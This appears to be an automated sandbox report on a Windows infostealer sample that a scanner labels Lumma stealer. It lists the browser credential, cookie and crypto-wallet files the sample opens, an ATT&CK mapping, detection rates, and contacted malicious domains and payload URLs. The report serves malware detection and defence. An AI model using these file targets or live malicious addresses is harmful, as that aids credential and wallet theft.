                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Binance\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, Directory queried: C:\Users\user\Documents\DTBZGIOOSO
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, Directory queried: C:\Users\user\Documents\DVWHKMNFNN
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, Directory queried: C:\Users\user\Documents\HTAGVDFUIE
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, Directory queried: C:\Users\user\Documents\JSDNGYCOWY
                Source: Yara match, File source: Process Memory Space: F441.exe PID: 3192, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara matchFile source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6D080D60 sqlite3_bind_parameter_name,9_2_6D080D60
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6D080C40 sqlite3_bind_zeroblob,9_2_6D080C40
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFA8EA0 sqlite3_clear_bindings,9_2_6CFA8EA0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6D080B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,9_2_6D080B40
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFA6410 bind,WSAGetLastError,9_2_6CFA6410
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFA60B0 listen,WSAGetLastError,9_2_6CFA60B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFA6070 PR_Listen,9_2_6CFA6070
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFAC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,9_2_6CFAC050
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFAC030 sqlite3_bind_parameter_count,9_2_6CFAC030
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CF322D0 sqlite3_bind_blob,9_2_6CF322D0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFA63C0 PR_Bind,9_2_6CFA63C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFA94F0 sqlite3_bind_text16,9_2_6CFA94F0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFA94C0 sqlite3_bind_text,9_2_6CFA94C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFA9480 sqlite3_bind_null,9_2_6CFA9480
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp; Code function: 9_2_6CFA9400 sqlite3_bind_int64,9_2_6CFA9400
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: 1 Windows Management Instrumentation; 1 Shared Modules; 1 Exploitation for Client Execution; 1 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 1 DLL Side-Loading; 812 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 11 Masquerading; 22 Virtualization/Sandbox Evasion; 812 Process Injection; 1 Hidden Files and Directories
                Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 1 System Time Discovery; 12 File and Directory Discovery; 37 System Information Discovery; 1 Network Share Discovery; 551 Security Software Discovery; 22 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; Network Sniffing
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Archive Collected Data; 41 Data from Local System; 1 Screen Capture; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 14 Ingress Tool Transfer; 21 Encrypted Channel; 4 Non-Application Layer Protocol; 125 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                [Behavior graph] ID: 1447651, Sample: 4.exe, Start date: 26/05/2024, Architecture: WINDOWS, Score: 100

                Source | Detection | Scanner | Label | Link
                4.exe | 39% | ReversingLabs | |
                4.exe | 45% | Virustotal | | Browse
                4.exe | 100% | Avira | HEUR/AGEN.1311176 |
                4.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\sdveeeu | 100% | Avira | HEUR/AGEN.1311176 |
                C:\Users\user\AppData\Local\Temp\F441.exe | 100% | Avira | TR/AVI.AceCrypter.javlp |
                C:\Users\user\AppData\Roaming\sdveeeu | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Temp\9EDA.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Temp\F441.exe | 100% | Joe Sandbox ML | |
                C:\ProgramData\HJJJECFIECBG\freebl3.dll | 0% | ReversingLabs | |
                C:\ProgramData\HJJJECFIECBG\mozglue.dll | 0% | ReversingLabs | |
                C:\ProgramData\HJJJECFIECBG\msvcp140.dll | 0% | ReversingLabs | |
                C:\ProgramData\HJJJECFIECBG\nss3.dll | 0% | ReversingLabs | |
                C:\ProgramData\HJJJECFIECBG\softokn3.dll | 0% | ReversingLabs | |
                C:\ProgramData\HJJJECFIECBG\vcruntime140.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\F441.exe | 96% | ReversingLabs | Win32.Spyware.Lummastealer |
                C:\Users\user\AppData\Local\Temp\kat796E.tmp | 4% | ReversingLabs | |
                C:\Users\user\AppData\Roaming\sdveeeu | 39% | ReversingLabs | |

                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                whispedwoodmoodsksl.shop | 17% | Virustotal | | Browse
                steamcommunity.com | 0% | Virustotal | | Browse
                dbfhns.in | 5% | Virustotal | | Browse

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                whispedwoodmoodsksl.shop | 188.114.96.3 | true | true | | unknown
                steamcommunity.com | 104.102.42.29 | true | true | | unknown
                dbfhns.in | 190.28.110.209 | true | true | | unknown

                Name | Malicious | Antivirus Detection | Reputation
                whispedwoodmoodsksl.shop | true | 17%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                http://guteyr.cc/tmp/index.php | true | 13%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                https://65.109.242.59/nss3.dll | false | Avira URL Cloud: safe | unknown
                https://65.109.242.59/freebl3.dll | false | Avira URL Cloud: safe | unknown
                http://45.129.96.86/file/update.exe | true | 20%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                https://steamcommunity.com/profiles/76561199689717899 | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                https://65.109.242.59/mozglue.dll | false | Avira URL Cloud: safe | unknown
                https://65.109.242.59/vcruntime140.dll | false | Avira URL Cloud: safe | unknown
                holicisticscrarws.shop | true | Avira URL Cloud: malware | unknown
                • URL Reputation: safe
                unknown
                https://t.me/copterwinr0isMozilla/5.0kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://65.109.242.59/kXkat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jskat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctakat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drfalse
                • URL Reputation: safe
                unknown
                http://ocsp.rootca1.amazontrust.com0:F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://65.109.242.59/Tkat796E.tmp, 00000009.00000003.2569509990.0000000000932000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://www.ecosia.org/newtab/F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://lv.queniujq.cnkat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.youtube.com/kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.59/Ukat796E.tmp, 00000009.00000003.2548139998.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngkat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://whispedwoodmoodsksl.shop/lF441.exe, 00000006.00000002.2557803498.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://community.clokat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.google.com/recaptcha/kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://checkout.steampowered.com/kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bkat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngkat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://outlook.com_explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBFCFBF.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://whispedwoodmoodsksl.shop/aFXF441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://65.109.242.59/vcruntime140.dll/kat796E.tmp, 00000009.00000002.2826699308.00000000008BD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://whispedwoodmoodsksl.shop/B9EF441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://help.steampowered.com/en/kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.microexplorer.exe, 00000001.00000000.1694112047.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1693681888.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1695682915.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://recaptcha.net/recaptcha/;kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://broadcast.st.dl.eccdnx.comkat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifkat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vkat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  http://x1.c.lencr.org/0F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://x1.i.lencr.org/0F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pkat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
